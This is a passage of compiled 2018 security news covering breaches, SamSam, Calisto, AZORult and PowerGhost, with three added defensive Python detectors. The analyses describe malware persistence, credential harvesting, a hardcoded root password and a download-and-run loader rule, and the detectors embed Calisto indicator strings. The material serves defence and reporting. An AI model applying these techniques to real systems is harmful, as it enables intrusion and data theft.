“The development environment is a critical part of the software development life cycle. We should always try to secure it first. Otherwise other security countermeasures could just be attempts in vain,” the security firm concludes.


Medical System Notifies 1.4M Patients About Computer Breach
1.8.2018 securityweek   Incident

A major Iowa hospital and medical clinic system has notified about 1.4 million patients and former patients about a computer breach that might have exposed their personal information.

UnityPoint Health officials say hackers broke into the company's email system and could have obtained medical information.

UnityPoint's privacy officer, RaeAnn Isaacson, said Monday the company isn't aware of any misuse of patient information related to the incident. But she says the company is telling patients what UnityPoint is doing to address the situation and what patients can do to help protect their information.

The company says the hackers also might have obtained some patients' financial information.

UnityPoint says that after the problem was discovered on May 31, it hired outside experts and notified the FBI.


SamSam Ransomware operators earned more than US$5.9 Million since late 2015
1.8.2018 securityaffairs Ransomware

Security experts from Sophos have published a report on the multimillion-dollar black market business that ransomware has become for crooks, using the SamSam ransomware as a case study.

The researchers, who tracked the Bitcoin addresses managed by the crime gang, discovered that the crooks behind the SamSam ransomware had extorted nearly $6 million from victims since December 2015, when it first appeared in the threat landscape.

“SamSam has earned its creator(s) more than US$5.9 Million since late 2015. 74% of the known victims are based in the United States. Other regions known to have suffered attacks include Canada, the UK, and the Middle East.” reads the report published by Sophos.

“The largest ransom paid by an individual victim, so far, is valued at US$64,000, a significantly large amount compared to most ransomware families.”

Sophos tracked the Bitcoin addresses reported in all the SamSam versions it has spotted and discovered that 233 victims paid an overall amount of $5.9 million; the security firm also estimated that the group is netting around $300,000 per month.

“In total, we have now identified 157 unique addresses which have received ransom payments as well as 89 addresses which have been used on ransom notes and sample files but, to date, have not received payments,” continues the report published by Sophos.

“By analyzing the payments, and comparing this with ransom notes at the time, we can estimate the number of individual victims who have chosen to pay at least some of the ransom amount stands at 233 as of July 19th 2018. With an estimated 1 new victim being attacked each day, we believe that roughly 1 in 4 victims pay at least some of the ransom.”


The attackers deploy the SamSam ransomware manually after compromising RDP on the target machine; this aspect makes SamSam infections different from those associated with other ransomware families that rely on spam campaigns or malvertising.

The attackers carry out brute-force attacks against RDP on the target system; sometimes they leverage credentials obtained from other data breaches, typically offered for sale on the dark web.

Once a system inside the targeted organization is compromised, the SamSam operators search for other machines to infect while stealing credentials.

When operators discover a potential target they manually deploy SamSam using tools like PSEXEC and batch scripts.
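A defender-side check for the RDP entry step described here (and in the Sophos write-up summarized earlier on this page), added as an example that is not part of the Sophos report: it scans Windows Security event records for a burst of failed logons (event 4625) from one source address followed by a successful RemoteInteractive logon (event 4624, logon type 10) from the same address. The records are constructed for the example in a simplified pipe-separated form, and the threshold and window are assumed values to tune.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta


def _build_sample_events() -> str:
    """Constructed records: 25 RDP logon failures from one address over about
    three minutes, a successful RDP logon from that address shortly after, and
    three routine RDP logons from an unrelated address.
    Format: ISO timestamp|EventID|LogonType|Account|SourceIP"""
    base = datetime(2018, 7, 10, 2, 0, 0)
    lines = []
    for i in range(25):
        ts = base + timedelta(seconds=8 * i)
        lines.append(f"{ts.isoformat()}|4625|10|administrator|203.0.113.45")
    success = base + timedelta(minutes=4)
    lines.append(f"{success.isoformat()}|4624|10|administrator|203.0.113.45")
    for i in range(3):
        ts = base + timedelta(minutes=1 + i)
        lines.append(f"{ts.isoformat()}|4624|10|jdoe|198.51.100.7")
    return "\n".join(lines)


SAMPLE_EVENTS = _build_sample_events()


def parse_events(text: str) -> list:
    """Parse the simplified records into dicts, oldest first."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, event_id, logon_type, account, src = line.split("|")
        events.append({
            "ts": datetime.fromisoformat(ts),
            "event_id": int(event_id),
            "logon_type": int(logon_type),
            "account": account,
            "src": src,
        })
    return sorted(events, key=lambda e: e["ts"])


def detect_rdp_bruteforce(events: list, threshold: int = 20,
                          window: timedelta = timedelta(minutes=10)) -> list:
    """Alert when a source address succeeds at an RDP logon after at least
    `threshold` failed RDP logons from that address within `window`."""
    failures = defaultdict(deque)  # source IP -> timestamps of recent 4625 events
    alerts = []
    for ev in events:
        if ev["logon_type"] != 10:  # only RemoteInteractive (RDP) logons matter here
            continue
        recent = failures[ev["src"]]
        while recent and ev["ts"] - recent[0] > window:
            recent.popleft()  # drop failures that fell outside the window
        if ev["event_id"] == 4625:
            recent.append(ev["ts"])
        elif ev["event_id"] == 4624 and len(recent) >= threshold:
            alerts.append({"ts": ev["ts"], "src": ev["src"],
                           "account": ev["account"], "failures": len(recent)})
            recent.clear()
    return alerts


if __name__ == "__main__":
    for a in detect_rdp_bruteforce(parse_events(SAMPLE_EVENTS)):
        print(f"{a['ts']} RDP logon from {a['src']} as {a['account']} "
              f"after {a['failures']} failures in the preceding window")
```

Real 4625 records for RDP sessions negotiated with Network Level Authentication often carry logon type 3 rather than 10, so a production rule should accept both for the failure side.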

The following diagram shows the different steps of the latest SamSam variant for which the initial infection vector is still unclear.


Once they have infected as many systems as possible in the targeted organization, the operators offer a complete clean-up of the infected systems for a special price.

The highest estimate has been US$850,000 worth of bitcoin for the decryption keys.

The encryption process targets the most valuable data first, thanks to a multi-tiered priority system; the SamSam ransomware doesn’t encrypt Windows system-related files.

Since its discovery, the SamSam ransomware targeted large organizations, including hospitals and educational institutions.

Sophos provides the following recommendations to secure the network of organizations against the SamSam ransomware:

regularly patch against known vulnerabilities in applications and operating systems;
keep regular backups;
use multi-factor authentication;
restrict access to RDP (on port 3389).


Dixons Carphone Data Breach discovered in June affected 10 Million customers
1.8.2018 securityaffairs  Incident

Dixons Carphone announced on Monday that the security breach discovered in June affected around 10 million customers, much more than the initial estimate.
Dixons Carphone, one of the largest European consumer electronics and telecommunication retailers, suffered a major data breach in 2017, and new details about the incident have now been shared.

The situation was worse than initially thought, the company announced on Monday that the security breach affected around 10 million customers, much more than the initial estimate.

“Our investigation, which is now nearing completion, has identified that approximately 10 million records containing personal data may have been accessed in 2017.” reads a statement published by the company.

“While there is now evidence that some of this data may have left our systems, these records do not contain payment card or bank account details and there is no evidence that any fraud has resulted. We are continuing to keep the relevant authorities updated.”

Dixons Carphone discovered in June 2017 an “unauthorised access” to certain data held by the company; it promptly launched an investigation and hired an external firm to shed light on the case.

The company immediately reported the hack to law enforcement, regulators at the Information Commissioner’s Office and the Financial Conduct Authority.

Hackers may have accessed personal information of the affected customers including their names, addresses and email addresses last year.
In June it was estimated that hackers had accessed the data of 1.2 million people and that 5.9 million payment cards used at Currys PC World and Dixons Travel were exposed.

Dixons Carphone assured its customers that no financial data was exposed (pin codes, card verification values and authentication data).

“As a precaution, we are choosing to communicate to all of our customers to apologize and advise them of protective steps to minimize the risk of fraud,” continues the statement. “We are continuing to keep the relevant authorities updated.”


The company announced further security measures to protect its systems and confirmed that all necessary actions to lock out the attackers have been taken.
“We continue to make improvements and investments at pace to our security environment through enhanced controls, monitoring, and testing,” Dixons said.

This isn’t the first time the company has suffered a security breach: in 2015 another incident exposed the credit card details of 90,000 Dixons Carphone customers.

Affected customers are nonetheless potentially exposed to phishing attacks and should remain vigilant.


Ransomware attack against COSCO spread beyond its US network to Americas
1.8.2018 securityaffairs Ransomware

New revelations on the attack against COSCO confirm it was worse than initially thought: the ransomware spread beyond the US network.
Chinese shipping giant COSCO recently suffered a ransomware attack that disrupted some systems of the company in the United States.

The shipping company quickly isolated the affected systems to avoid propagation to other regions and started an internal investigation; the firm confirmed that the incident did not affect the operations of its fleet.

“After the network security problem in the Americas has been detected, to protect the interests of our customers, we have taken proactive measures to isolate internal networks to carry out technical inspections on global scale.” COSCO said in an official statement. “With the reliable confirmation from the technical experts that the networks in all other regions are secure, the network applications were recovered at 16:00 (Beijing Time) on 25th July in all the regions except the Americas. As of now, all the business operations have been back to normal in the regions with network recovered.”

New revelations on the attack confirm it was worse than initially thought: the malicious code spread beyond the company’s US network and infected systems in other countries, including Argentina, Brazil, Canada, Chile, Panama, Peru, and Uruguay.

“Chinese shipping giant COSCO said a ransomware attack has spread beyond its US network to the broader Americas, including Argentina, Brazil, Canada, Chile, Panama, Peru, and Uruguay.” reported the CBR website.

“That’s according to maritime intelligence house Lloyds List, which has reported that customers were also said to be facing issues in the UK and Turkey.”

Due to the local network breakdown within the Americas region, local email and network telephony did not work properly at the time of the attack.

The attack on the world’s largest shipping company by dry weight tonnage has taken out emails and phones.

The company published a list of alternative Yahoo! email addresses to its customers for ordinary communications.

Security experts warned that the COSCO fleet could still be at risk following the attack.

“Although COSCO has been quick to respond to this hack, the virus may have been dormant for some time, so I would not be surprised if other systems – shore- and ship-based systems – have been breached. We strongly recommend to whoever discovered the attack to thoroughly verify the breach has been contained and has not infected any ships in the COSCO fleet.” Maritime cybersecurity specialists Naval Dome told IHS Fairplay.


The ransomware attack against COSCO doesn’t appear as severe as the NotPetya attack that hit shipping giant Maersk in August 2017.

According to Maersk’s second quarter earnings report, the company expected losses between $200 million and $300 million due to “significant business interruption”, because it was forced to temporarily halt critical systems infected with the ransomware.

Møller-Maersk chair Jim Hagemann Snabe during a speech at the World Economic Forum explained that the attack forced the IT staff to reinstall “4,000 new servers, 45,000 new PCs, and 2,500 applications,” practically “a complete infrastructure.”


Calisto Trojan for macOS

31.7.2018 Kaspersky Apple
The first member of the Proton malware family?
An interesting aspect of studying a particular piece of malware is tracing its evolution and observing how the creators gradually add new monetization or entrenchment techniques. Also of interest are developmental prototypes that have had limited distribution or not even occurred in the wild. We recently came across one such sample: a macOS backdoor that we named Calisto.

The malware was uploaded to VirusTotal way back in 2016, most likely the same year it was created. But for two whole years, until May 2018, Calisto remained off the radar of antivirus solutions, with the first detections on VT appearing only recently.

Malware for macOS is not that common, and this sample was found to contain some suspiciously familiar features. So we decided to unpick Calisto to see what it is and why its development was stopped (or was it?).

Propagation
We have no reliable information about how the backdoor was distributed. The Calisto installation file is an unsigned DMG image under the guise of Intego’s security solution for Mac. Interestingly, Calisto’s authors chose the ninth version of the program as a cover, a version that is still current.

For illustrative purposes, let’s compare the malware file with the version of Mac Internet Security X9 downloaded from the official site.

Backdoor: unsigned. Intego Mac Internet Security 2018: signed by Intego.

It looks fairly convincing. The user is unlikely to notice the difference, especially if he has not used the app before.

Installation
As soon as it starts, the application presents us with a sham license agreement. The text differs slightly from Intego’s; perhaps the cybercriminals took it from an earlier version of the product.

Next, the “antivirus” asks for the user’s login and password, which is completely normal when installing a program able to make changes to the system on macOS.

But after receiving the credentials, the program hangs slightly before reporting that an error has occurred and advising the user to download a new installation package from the official site of the antivirus developer.

The technique is simple, but effective. The official version of the program will likely be installed with no problems, and the error will soon be forgotten. Meanwhile, in the background, Calisto will be calmly getting on with its mission.

Analysis of the Trojan
With SIP enabled
Calisto’s activity on a computer with SIP (System Integrity Protection) enabled is rather limited. Announced by Apple back in 2015 alongside the release of OSX El Capitan, SIP is designed to protect critical system files from being modified — even by a user with root permissions. Calisto was developed in 2016 or earlier, and it seems that its creators simply didn’t take into account the then-new technology. However, many users still disable SIP for various reasons; we categorically advise against doing so.

Calisto’s activity can be investigated using its child process log and decompiled code:

Log of commands executed by the Trojan during its operation

Hardcoded commands inside the Calisto sample

We can see that the Trojan uses a hidden directory named .calisto to store:

Keychain storage data
Data extracted from the user login/password window
Information about the network connection
Data from Google Chrome: history, bookmarks, cookies
Recall that Keychain stores passwords/tokens saved by the user, including ones saved in Safari. The encryption key for the storage is the user’s password.

Next, if SIP is enabled, an error occurs when the Trojan attempts to modify system files. This violates the operational logic of the Trojan, causing it to stop.

Error message

With SIP disabled/not available
Observing Calisto with SIP disabled is far more interesting. To begin with, Calisto executes the steps from the previous chapter, but as the Trojan is not interrupted by SIP, it then:

Copies itself to /System/Library/ folder
Sets itself to launch automatically on startup
Unmounts and uninstalls its DMG image
Adds itself to Accessibility
Harvests additional information about the system
Enables remote access to the system
Forwards the harvested data to a C&C server
Let’s take a closer look at the malware’s implementation mechanisms.

Adding itself to startup is a classic technique for macOS, and is done by creating a .plist file in the /Library/LaunchAgents/ folder with a link to the malware:

The DMG image is unmounted and uninstalled via the following command:

To extend its capabilities, Calisto adds itself to Accessibility by directly modifying the TCC.db file, which is bad practice and an indicator of malicious activity for the antivirus. On the other hand, this method does not require user interaction.
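The LaunchAgent persistence described above can be audited from the defender's side with a small script that parses each agent's plist and flags the traits Calisto leaves behind: a label carrying the "com.proton.calisto" string and a program path under the SIP-protected /System/Library/ tree. This is an added example, not Kaspersky's tooling or code from the malware; the sample plists, the `/System/Library/.calisto/agent` path and the check list are constructed for illustration.

```python
import plistlib
from pathlib import Path
from typing import Dict, List

# Traits of the Calisto persistence described in the write-up: an agent whose
# label carries the "com.proton.calisto" string, or whose program lives under
# /System/Library/, a SIP-protected location no third-party agent should use.
SUSPICIOUS_LABEL_FRAGMENTS = ("com.proton.calisto", "calisto")
SIP_PROTECTED_PREFIXES = ("/System/Library/",)


def program_path(plist: Dict) -> str:
    """Return the executable a LaunchAgent plist points to (Program, else ProgramArguments[0])."""
    if plist.get("Program"):
        return str(plist["Program"])
    args = plist.get("ProgramArguments") or []
    return str(args[0]) if args else ""


def audit_launch_agent(plist: Dict) -> List[str]:
    """Return human-readable findings for one parsed LaunchAgent; an empty list means nothing odd."""
    findings: List[str] = []
    label = str(plist.get("Label", ""))
    path = program_path(plist)
    if any(frag in label.lower() for frag in SUSPICIOUS_LABEL_FRAGMENTS):
        findings.append(f"label matches a known Calisto/Proton string: {label}")
    if path.startswith(SIP_PROTECTED_PREFIXES):
        findings.append(f"program lives under a SIP-protected path: {path}")
    if plist.get("RunAtLoad") and not path:
        findings.append("RunAtLoad is set but no Program/ProgramArguments given")
    return findings


def audit_plist_bytes(data: bytes) -> List[str]:
    """Parse a plist (XML or binary form) and audit it."""
    return audit_launch_agent(plistlib.loads(data))


def scan_launch_agents(directory: str = "/Library/LaunchAgents") -> Dict[str, List[str]]:
    """Audit every .plist in a LaunchAgents folder; returns {file name: findings} for flagged files only."""
    flagged: Dict[str, List[str]] = {}
    for path in Path(directory).glob("*.plist"):
        try:
            findings = audit_plist_bytes(path.read_bytes())
        except Exception as exc:  # malformed XML or binary plist: worth a look in itself
            findings = [f"unparseable plist: {exc}"]
        if findings:
            flagged[path.name] = findings
    return flagged


# Constructed sample agents for offline use (not files taken from the malware).
CALISTO_LIKE_AGENT = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>Label</key><string>com.proton.calisto.plist</string>
  <key>ProgramArguments</key>
  <array><string>/System/Library/.calisto/agent</string></array>
  <key>RunAtLoad</key><true/>
</dict>
</plist>
"""

BENIGN_AGENT = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key>
  <array><string>/Applications/Example.app/Contents/MacOS/updater</string><string>--check</string></array>
  <key>StartInterval</key><integer>3600</integer>
</dict>
</plist>
"""

if __name__ == "__main__":
    print("constructed Calisto-like agent:", audit_plist_bytes(CALISTO_LIKE_AGENT))
    print("constructed benign agent:", audit_plist_bytes(BENIGN_AGENT))
    for name, findings in scan_launch_agents().items():
        print(name, "->", "; ".join(findings))
```

On a real Mac the same checks should be run over ~/Library/LaunchAgents and /Library/LaunchDaemons as well, since the page only names the one folder Calisto used.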

An important feature of Calisto is getting remote access to the user system. To provide this, it:

Enables remote login
Enables screen sharing
Configures remote login permissions for the user
Allows remote login to all
Enables a hidden “root” account in macOS and sets the password specified in the Trojan code
The commands used for this are:

Note that although the user “root” exists in macOS, it is disabled by default. Interestingly, after a reboot, Calisto again requests user data, but this time waits for the input of the actual root password, which it previously changed itself (root: aGNOStIC7890!!!). This is one indication of the Trojan’s rawness.

At the end, Calisto attempts to transfer all data from the .calisto folder to the cybercriminals’ server. But at the time of our research, the server was no longer responding to requests and seemed to be disabled:

Attempt to contact the C&C server

Extra functions
Static analysis of Calisto revealed unfinished and unused additional functionality:

Loading/unloading of kernel extensions for handling USB devices
Data theft from user directories
Self-destruction together with the OS

Loading/unloading of kernel extensions

Working with user directories

Self-destruction together with the entire system

Connections with Backdoor.OSX.Proton
Conceptually, the Calisto backdoor resembles a member of the Backdoor.OSX.Proton family:

The distribution method is similar: it masquerades as a well-known antivirus (a Backdoor.OSX.Proton sample was previously distributed under the guise of a Symantec antivirus product)
The Trojan sample contains the line “com.proton.calisto.plist”
Like Backdoor.OSX.Proton, this Trojan is able to steal a great amount of personal data from the user system, including the contents of Keychain
Recall that all known members of the Proton malware family were distributed and discovered in 2017. The Calisto Trojan we detected was created no later than 2016. Assuming that this Trojan was written by the same authors, it could well be one of the very first versions of Backdoor.OSX.Proton or even a prototype. The latter hypothesis is supported by the large number of unused and not fully implemented functions. However, they were missing from later versions of Proton.

To protect against Calisto, Proton, and their analogues:

Always update to the current version of the OS
Never disable SIP
Run only signed software downloaded from trusted sources, such as the App Store
Use antivirus software
MD5

DMG image: d7ac1b8113c94567be4a26d214964119
Mach-O executable: 2f38b201f6b368d587323a1bec516e5d


Advanced Malvertising Campaign Exploits Online Advertising Supply Chain
31.7.2018 securityweek Exploit Virus

Malvertising Campaign Steals Traffic From 10,000 Hacked WordPress Sites and Exploits the Online Advertising Supply Chain

Malvertising is neither a new nor insignificant threat -- nor is there any easy solution to stop it. It is the abuse of the online advertising industry to deliver malware disguised as or hidden within seemingly innocuous advertisements.

Researchers at Check Point have discovered what they describe as the infrastructure and methods used in a large ‘malvertising’ and banking Trojan campaign, which delivers malicious adverts to millions worldwide through the HiBids online advertising platform.

The campaign starts with a threat actor that Check Point describes as 'Master134'. He sold stolen web traffic from 10,000 hacked WordPress sites to, say the researchers, "AdsTerra, the real time bidding (RTB) ad platform, who then sold it to Resellers (ExoClick, AdKernel, EvoLeads and AdventureFeeds)."

The researchers told SecurityWeek, "The traffic is stolen from the compromised WordPress sites via a known exploit on that platform, which enables the actor to insert a redirection to his malicious infrastructure."

Once this traffic has passed through AdsTerra, the resellers sell it to the highest-bidding advertiser. Unfortunately, the return on malware distribution is (almost) immediate via malware such as ransomware, miners, and banking trojans. Because of this large return, malicious actors can usually afford to out-bid legitimate publishers.

"In this way," say the researchers, "cyber criminals are abusing the online advertising ecosystem, using it to bid alongside legitimate advertisers, like Nike or Coca Cola, but placing higher bids in order to have the ad-networks select their malware-laden ads to display on thousands of publishers’ websites instead of clean, legitimate ads."

Check Point does not provide details of the malware being distributed through this particular campaign, nor any of the publications that receive and unwittingly transmit the malware to innocent visitors. It merely states, "The ads often contain malicious code that exploits unpatched vulnerabilities in browsers or browser plug-ins, such as Adobe’s Flash Player, so that the user gets infected by ransomware, keyloggers, and other types of malware simply by visiting a site hosting the malicious link."

Luis Corrons, security evangelist at Avast, told SecurityWeek that past malvertising campaigns "have affected some of the biggest news sites, such as The New York Times, Huffington Post, Forbes, The Daily Mail and more. In order to go undetected, some of these attacks just last a few seconds each wave, to make it harder to track the source of the infection. JavaScript Monero miner even got to YouTube through an ad network last January."

SecurityWeek asked AdsTerra for a comment on malvertising and the Check Point report, but we have so far received no reply to our email. Of the two telephone numbers we were able to find, one is a mobile number (supposedly in Singapore) that was switched off, while the other (supposedly in Gibraltar) just terminated. AdsTerra, according to its website, is headquartered in Limassol, Cyprus; while Europages lists an address in Gibraltar.

Online advertiser reviews, however, provide a glowing endorsement for the organization; with one saying that AdsTerra is particularly strong on popunder adverts. Popunders are among the sneakiest of advertisements. Rather than run the risk of being closed by the user as soon as it is seen, popunders open in a new window underneath the current browser window and remain unseen until the focus window is closed. "That’s one of the main streams of malvertising," Check Point told SecurityWeek.

There is no easy defense against malvertising. Ad blockers work, but more and more publishers are blocking access to their pages when they detect a blocker. Users must either pay a subscription for no adverts, accept they cannot view the page they want, or receive the adverts that could potentially contain malware or malicious links.

Greater responsibility -- perhaps even legal liability -- on the advertiser would help. Corrons suggests, "A content check should be performed by the ad network (on both the advertisements and the landing pages)." He would also like to see greater active monitoring, background checking on the publishers, and legal contracts with high fines if the content is not secure.

Little of this currently happens. "Due to the really fast transactions, and the sheer volume of advertisements, we believe that there is no real-time monitoring by humans," Check Point told SecurityWeek. "Resellers need to know that their customers are 'bad guys', but most of them perform no vetting of their customers."

Trusting to luck is not a good security defense; but it seems that the most many users can do against malvertising is use an ad blocker, maintain an up-to-date anti-virus solution, minimize local vulnerabilities with judicious patching -- and trust to luck when all else fails.


Samsung Patches Critical Vulnerabilities in SmartThings Hub

31.7.2018 securityweek Vulnerability

Samsung has patched a series of critical vulnerabilities in its SmartThings Hub, which could be exploited to execute OS commands or other arbitrary code on vulnerable devices.

Designed as a central controller, the SmartThings Hub allows users to monitor and manage smart home devices such as smart plugs, LED light bulbs, thermostats, cameras, and more. The controller runs a Linux-based firmware that allows for communications with Internet of Things devices deployed in the home using Ethernet, Zigbee, Z-Wave and Bluetooth.

An attacker able to leverage the discovered vulnerabilities could access sensitive information gathered by the connected devices, monitor and control devices within the home, and perform unauthorized activities. They could also unlock homes, monitor users via cameras inside homes, disable motion detectors, and even cause physical damage to appliances.

A total of 20 vulnerabilities impacting the SmartThings Hub were discovered by Talos researchers, who reveal that an attacker could “chain together three vulnerability classes that are present in the device to gain complete control of the device.” In a blog post, the researchers also describe different attack vectors an actor looking to exploit these vulnerability chains could use.

The vulnerabilities were found in Samsung SmartThings Hub STH-ETH-250, firmware version 0.20.17. Samsung has already released patches for all flaws and users are advised to update their devices to stay secure (Samsung pushes the updates automatically, so user interaction should not be necessary).


A new sophisticated version of the AZORult Spyware appeared in the wild

31.7.2018 securityaffairs Virus

A new sophisticated version of the AZORult Spyware was spotted in the wild, it was involved in a large email campaign on July 18
Malware researchers at Proofpoint spotted a new version of the AZORult spyware in the wild; it was used in a large email campaign on July 18, just 24 hours after it appeared on cybercrime forums on the Dark Web.

Attackers sent out thousands of messages targeting North America. The messages used employment-related subjects such as “About a role” and “Job Application,” while the malicious attached documents used file names in the format of “firstname.surname_resume.doc”.

“AZORult is a robust information stealer & downloader that Proofpoint researchers originally identified in 2016 as part of a secondary infection via the Chthonic banking Trojan. We have since observed many instances of AZORult dropped via exploit kits and in fairly regular email campaigns as both a primary and secondary payload.” reads the analysis published by ProofPoint.

“Recently, AZORult authors released a substantially updated version, improving both on its stealer and downloader functionality.”


AZORult is a data stealer first spotted in 2016 by Proofpoint, which discovered it as part of a secondary infection via the Chthonic banking trojan. It was later involved in many malspam attacks, but only now have the authors released a substantially updated variant.

The latest version appears more sophisticated than previous ones: it implements the ability to steal history from browsers (except IE and Edge), it includes a conditional loader that checks certain parameters before running the malicious code, and it adds support for the Exodus, Jaxx, Mist, Ethereum, Electrum and Electrum-LTC cryptocurrency wallets.

Below the full change log:

UPD v3.2
[+] Added stealing of history from browsers (except IE and Edge)
[+] Added support for cryptocurrency wallets: Exodus, Jaxx, Mist, Ethereum, Electrum, Electrum-LTC
[+] Improved loader. Now supports unlimited links. In the admin panel, you can specify the rules for how the loader works. For example: if there are cookies or saved passwords from mysite.com, then download and run the file link[.]com/soft.exe. Also there is a rule “If there is data from cryptocurrency wallets” or “for all”
[+] Stealer can now use system proxies. If a proxy is installed on the system, but there is no connection through it, the stealer will try to connect directly (just in case)
[+] Reduced the load in the admin panel.
[+] Added to the admin panel a button for removing “dummies”, i.e. reports without useful information
[+] Added to the admin panel guest statistics
[+] Added to the admin panel a geobase
The conditional loader allows the attackers to infect only systems with specific characteristics; for example, it can check whether certain desired cookies or saved passwords from specific sites are present on the victim’s machine.

After the malware has successfully connected to the C&C server, the server sends it the following files:

Next, after the initial exchange between the infected machine and the C&C server, the infected machine sends a report containing the stolen information. Again the report is XOR-encoded with the same 3-byte key; a portion of the decoded version is shown in Figure 5. The stolen information is organized into sections:

info: basic computer information such as Windows version and computer name
pwds: this section contains stolen passwords (not confirmed)
cooks: cookies or visited sites
file: contents of the cookies files and a file containing more system profiling information including machine ID, Windows version, computer name, screen resolution, local time, time zone, CPU model, CPU count, RAM, video card information, process listing of the infected machine, and software installed on the infected machine.
Once this phase is complete, AZORult may download the next-stage payload.
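Because both the initial exchange and the report are XOR-encoded with one fixed 3-byte key, an analyst holding a captured report can recover that key without knowing it in advance: each key byte only touches every third byte of the ciphertext, so the problem splits into three independent single-byte XOR searches scored on how text-like the result is. The following is an added example, not Proofpoint's code; the key, the report text and the scoring weights are constructed for illustration and are not taken from the malware.

```python
import string

KEY_LENGTH = 3  # the updated AZORult encodes its C&C exchanges with a fixed 3-byte key

# Byte classes used by the text-likeness heuristic (all ASCII).
PRINTABLE = set(string.printable.encode("ascii"))
LETTERS_AND_SPACE = set((string.ascii_letters + " ").encode("ascii"))
DIGITS = set(string.digits.encode("ascii"))


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating key; XOR is symmetric, so this both encodes and decodes."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def text_score(data: bytes) -> int:
    """How much does this byte string look like ASCII text? Non-printables are penalised hard."""
    score = 0
    for b in data:
        if b in LETTERS_AND_SPACE:
            score += 3
        elif b in DIGITS:
            score += 2
        elif b in PRINTABLE:
            score += 1
        else:
            score -= 20
    return score


def recover_xor_key(ciphertext: bytes, key_length: int = KEY_LENGTH) -> bytes:
    """Recover a repeating XOR key of known length from ciphertext alone.

    Key byte `pos` only affects ciphertext positions i with i % key_length == pos,
    so each such stripe is a single-byte XOR problem solved by trying all 256 values
    and keeping the one whose output looks most like text.
    """
    key = bytearray()
    for pos in range(key_length):
        stripe = ciphertext[pos::key_length]
        best = max(range(256), key=lambda k: text_score(bytes(b ^ k for b in stripe)))
        key.append(best)
    return bytes(key)


def decode_report(ciphertext: bytes) -> bytes:
    """Recover the key from the captured report and return the decoded report."""
    return xor_repeating(ciphertext, recover_xor_key(ciphertext))


# Constructed sample: a made-up key and a made-up report in the info/pwds/cooks/file
# layout the analysis describes. Neither value comes from a real AZORult sample.
SAMPLE_KEY = b"\x5a\x17\xc3"
SAMPLE_REPORT = (
    b"info: windows 10 pro build 17134, machine id 3f9a, computer name lab-ws-01, user analyst\n"
    b"pwds: no saved browser passwords were found in this profile\n"
    b"cooks: session cookies for example.com and shop.example.org were collected\n"
    b"file: screen 1920x1080, local time 14:05, time zone utc, cpu count 4, ram 8192 mb\n"
)
SAMPLE_CIPHERTEXT = xor_repeating(SAMPLE_REPORT, SAMPLE_KEY)

if __name__ == "__main__":
    recovered = recover_xor_key(SAMPLE_CIPHERTEXT)
    print("recovered key:", recovered.hex())
    print(decode_report(SAMPLE_CIPHERTEXT).decode("ascii"))
```

The heuristic assumes the report is mostly ASCII text, which holds for the sections listed above; a report dominated by binary content would need a known-plaintext anchor instead.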

The experts attributed the campaign to the TA516 threat actor that was focused on cryptocurrencies.

“As in legitimate software development, malware authors regularly update their software to introduce competitive new features, improve usability, and otherwise differentiate their products.” said ProofPoint.

“The recent update to AZORult includes substantial upgrades to malware that was already well-established in both the email and web-based threat landscapes. It is noteworthy that within a day of the new update appearing on underground forums, a prolific actor used the new version in a large email campaign, leveraging its new capabilities to distribute Hermes ransomware.”

Experts noticed that the infection process requires significant user interaction in order to evade antivirus. Victims have to download the password-protected document and enter, in a pop-up box, the password included in the body of the email; only then does the attack proceed by asking the user to enable macros.

The macros download AZORult, which in turn downloads the Hermes 2.1 ransomware.

“AZORult malware, with its capabilities for credential and cryptocurrency theft, brings potential direct financial losses for individuals as well as the opportunity for actors to establish a beachhead in affected organizations,” concluded the experts.


Titan Security Keys: Google announced USB-based FIDO U2F Keys
31.7.2018 securityaffairs Crypto

Google will start offering Titan Security Keys to provide a further layer of security to its users and protect them from phishing and MiTM attacks.
Google announced at the Google Cloud Next ’18 convention in San Francisco the launch of the Titan Security Key, a USB device used as part of its hardware-based two-factor authentication scheme for online accounts.

“Titan Security Key, available now to Cloud customers, and coming soon to the Google Store” states a blog post published by Google.

The hardware-based two-factor authentication scheme is designed to prevent account takeover through phishing and MiTM attacks even when the attacker has gained access to the user’s credentials.


Google shared data on the use of physical security keys by its personnel over a period of months: the tech giant confirmed that none of its 85,000 employees who used the hardware-based two-factor authentication key had fallen victim to phishing attacks.

“We have had no reported or confirmed account takeovers since implementing security keys at Google” a Google spokesperson said.

“Users might be asked to authenticate using their security key for many different apps/reasons. It all depends on the sensitivity of the app and the risk of the user at that point in time.”

The authentication through the physical USB security key is more secure compared to other processes.

The Titan Security Key is based on the FIDO (Fast IDentity Online) Alliance’s U2F (Universal 2nd Factor) protocol and was entirely designed by Google.

The Titan Security Key is available in both USB and Bluetooth versions; Google will offer it for sale in its online store within the next few months.

Logging in on mobile devices will require the Bluetooth version.

Google did not reveal the price for Titan Security Keys, but rumors say it will be available for around $20 or $30.

The Titan keys will be compatible with major browsers (i.e. Chrome, Firefox, and Opera) and many online services, including Dropbox, Facebook and GitHub.


Fileless PowerGhost cryptocurrency miner leverages EternalBlue exploit to spread
31.7.2018 securityaffairs Cryptocurrency

Security experts from Kaspersky Lab have spotted a new cryptocurrency miner dubbed PowerGhost that can spread leveraging a fileless infection technique.
The PowerGhost miner targets large corporate networks, infecting both workstations and servers, and employs multiple fileless techniques to evade detection.

“The malware, which we dubbed PowerGhost, is capable of stealthily establishing itself in a system and spreading across large corporate networks infecting both workstations and servers.” reads the analysis published by Kaspersky.

“This type of hidden consolidation is typical of miners: the more machines that get infected and the longer they remain that way, the greater the attacker’s profits. Therefore, it’s not uncommon to see clean software being infected with a miner; the popularity of the legitimate software serves to promote the malware’s proliferation.”

PowerGhost leverages the NSA-linked EternalBlue exploit to spread. It is an obfuscated PowerShell script containing the malware’s core code along with several add-on modules: the miner, the miner’s libraries, the Mimikatz post-exploitation tool, a module for reflective PE injection, and shellcode for the EternalBlue exploit.

